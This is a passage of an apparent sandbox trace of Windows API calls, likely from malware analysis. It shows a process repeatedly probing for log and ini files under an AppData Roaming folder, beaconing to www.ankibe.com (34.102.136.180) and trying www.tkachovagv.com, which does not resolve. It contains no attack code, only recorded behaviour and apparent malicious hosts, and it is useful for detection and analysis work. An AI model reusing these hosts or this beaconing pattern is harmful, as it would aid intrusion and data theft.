Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.632] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0223.632] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0223.632] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.632] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.632] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0223.632] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0223.632] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.632] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.633] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0223.633] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0223.633] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtPathName=0x26ef660, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.633] NtCreateFile (in: FileHandle=0x26ef600, DesiredAccess=0x120089, ObjectAttributes=0x26ef670*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef610, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef600*=0xffffffffffffffff, IoStatusBlock=0x26ef610*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.633] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef580 | out: HeapArray=0x26ef580*=0x300000) returned 0x11 [0223.633] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0223.633] socket (af=2, type=1, protocol=6) returned 0x580 [0223.633] getaddrinfo (in: pNodeName="www.ankibe.com", pServiceName="80", pHints=0x6f0bb58*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x6f0bb88 | out: ppResult=0x6f0bb88*=0x3eb4890*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x3f35d40*(sa_family=2, sin_port=0x50, sin_addr="34.102.136.180"), ai_next=0x0)) returned 0 [0223.656] connect (s=0x580, name=0x3f35d40*(sa_family=2, sin_port=0x50, sin_addr="34.102.136.180"), namelen=16) returned 0 [0223.677] send (s=0x580, buf=0x25a505a*, len=166, flags=0) returned 166 [0223.677] setsockopt (s=0x580, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0223.678] recv (in: s=0x580, buf=0x93af040, len=2048000, flags=0 | out: buf=0x93af040*) returned 461 [0223.815] closesocket (s=0x580) returned 0 [0223.815] Sleep (dwMilliseconds=0x7d0) [0223.816] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtPathName=0x26ef6d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.816] NtCreateFile (in: FileHandle=0x26ef670, DesiredAccess=0x120089, ObjectAttributes=0x26ef6e0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef680, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef670*=0xffffffffffffffff, IoStatusBlock=0x26ef680*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.817] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5f0 | out: HeapArray=0x26ef5f0*=0x300000) returned 0x11 [0223.817] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0223.817] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.817] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.817] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0223.817] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0223.817] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.817] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.817] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0223.817] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0223.817] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.817] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.817] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0223.817] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0223.817] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.817] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.817] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0223.817] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0223.817] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.817] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.817] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0223.817] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0223.817] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.818] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrm.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.818] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0223.818] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0223.818] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.818] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.818] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0223.818] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0223.818] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.818] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogro.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.818] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0223.818] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0223.818] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.818] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogcl.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.818] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0223.818] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0223.818] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtPathName=0x26ef660, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0223.818] NtCreateFile (in: FileHandle=0x26ef600, DesiredAccess=0x120089, ObjectAttributes=0x26ef670*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogim.jpeg", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef610, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef600*=0xffffffffffffffff, IoStatusBlock=0x26ef610*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0223.818] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef580 | out: HeapArray=0x26ef580*=0x300000) returned 0x11 [0223.818] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0223.818] Sleep (dwMilliseconds=0x7d0) [0223.833] Sleep (dwMilliseconds=0x7d0) [0223.848] Sleep (dwMilliseconds=0x7d0) [0223.863] Sleep (dwMilliseconds=0x7d0) [0223.880] Sleep (dwMilliseconds=0x7d0) [0223.894] Sleep (dwMilliseconds=0x7d0) [0223.910] Sleep (dwMilliseconds=0x7d0) [0223.926] Sleep (dwMilliseconds=0x7d0) [0223.942] Sleep (dwMilliseconds=0x7d0) [0223.958] Sleep (dwMilliseconds=0x7d0) [0223.972] Sleep (dwMilliseconds=0x7d0) [0223.988] Sleep (dwMilliseconds=0x7d0) [0224.004] Sleep (dwMilliseconds=0x7d0) [0224.019] Sleep (dwMilliseconds=0x7d0) [0224.035] Sleep (dwMilliseconds=0x7d0) [0224.066] Sleep (dwMilliseconds=0x7d0) [0224.082] socket (af=2, type=1, protocol=6) returned 0x580 [0224.082] getaddrinfo (in: pNodeName="www.tkachovagv.com", pServiceName="80", pHints=0x6f0bef8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x6f0bf28 | out: ppResult=0x6f0bf28*=0x0) returned 11001 [0224.108] Sleep (dwMilliseconds=0x7d0) [0224.113] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtPathName=0x26ef6d0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0224.113] NtCreateFile (in: FileHandle=0x26ef670, DesiredAccess=0x120089, ObjectAttributes=0x26ef6e0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlog00.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef680, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef670*=0xffffffffffffffff, IoStatusBlock=0x26ef680*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0224.113] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5f0 | out: HeapArray=0x26ef5f0*=0x300000) returned 0x11 [0224.113] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0224.113] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0224.113] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogri.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0224.113] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0224.113] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0224.113] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0224.113] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrf.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0224.114] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0224.114] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0224.114] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0224.114] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrt.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0224.114] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0224.114] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0224.114] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0224.114] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrg.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x26ef640, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x26ef630*=0xffffffffffffffff, IoStatusBlock=0x26ef640*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0224.114] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x26ef5b0 | out: HeapArray=0x26ef5b0*=0x300000) returned 0x11 [0224.114] RtlFreeHeap (HeapHandle=0x300000, Flags=0x0, BaseAddress=0x2472380) returned 1 [0224.114] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtPathName=0x26ef690, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0224.114] NtCreateFile (in: FileHandle=0x26ef630, DesiredAccess=0x120089, ObjectAttributes=0x26ef6a0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0-M2CU8W\\0-Mlogrc.ini", Attributes=0x40, 